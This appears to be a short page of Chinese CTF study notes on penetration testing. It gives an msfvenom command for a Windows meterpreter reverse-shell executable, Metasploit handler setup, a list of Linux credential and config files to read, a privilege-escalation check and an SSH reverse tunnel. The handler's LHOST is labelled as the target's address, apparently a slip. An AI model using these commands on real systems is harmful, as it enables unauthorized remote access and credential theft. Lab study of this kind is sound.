渗透测试

Nmap

参考资料

不老的神器:安全扫描器Nmap渗透使用指南:

https://www.freebuf.com/news/141607.html

Windows 渗透

利用msf套件

反弹shell

生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机地址> LPORT=<攻击机端口> -f exe > shell.exe

上传到靶机后

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <靶机地址>
set LPORT <攻击机端口>
exploit

拿到meterpreter shell以后

可以shell进入cmd环境

参考资料

https://guide.offsecnewbie.com/privilege-escalation/windows-pe

Linux 渗透

敏感文件

/etc/passwd
/etc/shadow

/proc/self

/proc/self/maps
/proc/self/cwd
/proc/self/status
/proc/self/exe

Apache

/etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf

字典

https://github.com/ev0A/ArbitraryFileReadList

提权

sudo -l

隧道

ssh port forwarding

ssh -R 9001:localhost:9001 [email protected]
© Eki's CTF-notes 2019-2020 CC-by-nc-sa 4.0。 all right reserved,powered by Gitbook本网站最后修订于: 2021-03-09 16:35:16

results matching ""

    No results matching ""